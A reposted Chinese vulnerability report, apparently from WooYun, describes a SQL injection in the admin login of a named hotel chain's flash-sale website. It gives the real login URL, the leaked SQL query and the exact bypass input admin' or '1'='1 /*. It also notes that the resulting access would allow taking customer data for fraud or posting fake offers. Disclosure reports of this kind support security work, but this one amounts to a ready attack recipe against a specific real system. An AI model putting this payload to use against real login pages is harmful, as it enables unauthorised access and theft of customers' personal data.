zoukankan      html  css  js  c++  java
  • 后台SQL注入实例

    简要描述:

    汉庭连锁酒店后台SQL注入,可绕过登陆限制进入后台,可脱库.

    详细说明:

    问题发生在这个站点.http://miaosha.htinns.com/



    标题内没有写具体信息.因为怕发布后被人入侵.



    后台登陆地址为:http://miaosha.htinns.com/admin/admin_login.php



    帐号输入admin'

    登陆后提示如下图



    爆出了查询语句.


    Database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '453e41d218e071ccfb2d1c99ce23906a'' at line 1]
    select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'





    重点在这里

    select * from users_admin where userid='admin'' and pwd='453e41d218e071ccfb2d1c99ce23906a'

    然后构造绕过

    使用帐号admin' or '1'='1 /*

    成功绕过登陆后台,截图如下

    拥有后台全部权限...可以获得所有秒杀成功的数据,对其进行诈骗.

    也可以发布秒杀信息,造成汉庭信任公关危机...

     

    摘自:http://www.wooyun.org/bugs/wooyun-2010-05156

  • 相关阅读:
    转 IDEA 解决代码提示功能消失
    模态框居中显示
    DetachedCriteria和Criteria的使用方法
    struts2配置文件详解
    springMVC上传图片
    在linux下运行mongodb
    webSocket客服在线交谈
    接口自动化
    easyui input文本框清除值
    Spring总结
  • 原文地址:https://www.cnblogs.com/milantgh/p/3645709.html
Copyright © 2011-2022 走看看